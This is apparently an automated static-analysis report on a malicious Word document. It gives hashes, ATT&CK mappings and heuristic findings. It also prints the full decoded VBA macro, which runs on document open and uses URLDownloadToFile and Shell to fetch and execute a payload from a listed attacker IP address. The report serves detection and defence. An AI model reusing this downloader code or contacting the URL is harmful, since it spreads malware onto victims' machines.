Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5ab2294f5fe312a4…

MALICIOUS

Office (OOXML)

Size: 304.1 KB
Created: 2019-04-18 08:25:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2020-02-04
MD5: 57f6cbcd5dcb4e6a7e8c1de3927a210c
SHA-1: f03542f7a97cafdace0450af32edbea76e1852a6
SHA-256: 5ab2294f5fe312a4c869e9360f974b052882b32aa7157896c3039459abd8e90b
Risk Score: 150

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes automatically when the document is opened. The macro uses the URLDownloadToFileA function to download a file from the URL "http://54.39.233.175/wupd19823.tmp". The presence of the Document_Open macro together with the URLDownloadToFileA call strongly indicates downloader functionality whose aim is to retrieve and execute a second-stage payload.

Heuristics (5)

  • VBA project inside OOXML | severity: medium | 3 related findings | rule: OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA | severity: critical | rule: OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
        If IsNumeric(45345) = True Then
            Shell erffver
        End If
  • URLDownloadToFile in VBA | severity: critical | rule: OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
    Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
            Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
  • Document_Open macro | severity: low | rule: OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        Iownhrtt
  • Embedded URL | severity: info | rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://54.39.233.175/wupd19823.tmp (referenced by: macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by: macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by: macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by: macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by: macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by: macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by: macro)
    • http://www.iec.ch (referenced by: macro)
    • http://ns.adobe.com/xap/1.0/ (referenced by: macro)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (referenced by: macro)
    • http://purl.org/dc/elements/1.1/ (referenced by: macro)
    • http://ns.adobe.com/xap/1.0/mm/ (referenced by: macro)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (referenced by: macro)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (referenced by: macro)
    • http://ns.adobe.com/photoshop/1.0/ (referenced by: macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2829 bytes
SHA-256: 8cb1d60388a38f3536e8b8f6b1ad634884e0c10a019ce0848e3d35107b87c78d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Iownhrtt
End Sub

Attribute VB_Name = "Mod1"

#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" _
        Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                    ByVal szURL As String, ByVal szFileName As String, _
                                    ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Sub Iownhrtt()
    tavvt = Array("yytt", "ewrwerwr", "krterggr")
    If IsNumeric(tavvt) = False Then
        If 543 > 344 Then
            Nujneett
        End If
    End If
End Sub


Attribute VB_Name = "PoijehFiuier"
Attribute VB_Base = "0{4B9BAAE7-D1B6-40D3-99C2-6199DD8F7D91}{C7B10BA5-B726-43C6-8588-30792A915A4D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Mnedjje1_Change()

End Sub

Private Sub UserForm_Initialize()
    Joime
End Sub
Function Joime()
    
    
    If IsArray(Array(1, 2, 3, 4, 5)) = True Then
        Fuinr566 t1, t2, 874, "ygfh534fghhg"
    End If
End Function
Function Fuinr566(ejnnrj111, ikwerwjjf22, ruwherweru333, hergdfgd444)
    If IsArray(ruwherweru333) = False Then
        Njiojwqehqw ejnnrj111, ikwerwjjf22, ruwherweru333
    End If

    Knwj = Len(hergdfgd444)
    If Knwj = 12 Then
        Gneriwer ejnnrj111
    End If
End Function




Attribute VB_Name = "Mod2"
Function Nujneett()
    If IsNumeric(875) = True Then
        Omnfjnwer
    End If
End Function



Attribute VB_Name = "Mod3"
Sub Njiojwqehqw(mnwuiubh22, miiwthb33, uiwherur44)
    If mnwuiubh22 <> miiwthb33 Then
        If IsNumeric(uiwherur44) = True Then
            URLDownloadToFile 0, miiwthb33, mnwuiubh22, 0, 0
        End If
    End If
End Sub


Sub Gneriwer(erffver)
    If IsNumeric(45345) = True Then
        Shell erffver
    End If
End Sub


Attribute VB_Name = "Mod4"
Function Omnfjnwer()
    PoijehFiuier.Show
End Function



Function t1()
    t1 = PoijehFiuier.Label1.Caption
End Function

Function t2()
    t2 = PoijehFiuier.Label2.Caption
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 24576 bytes
SHA-256: d48c61055ae379278df9bb9669ac1fa036bbefb728dc0d94075aaad1481ca5a5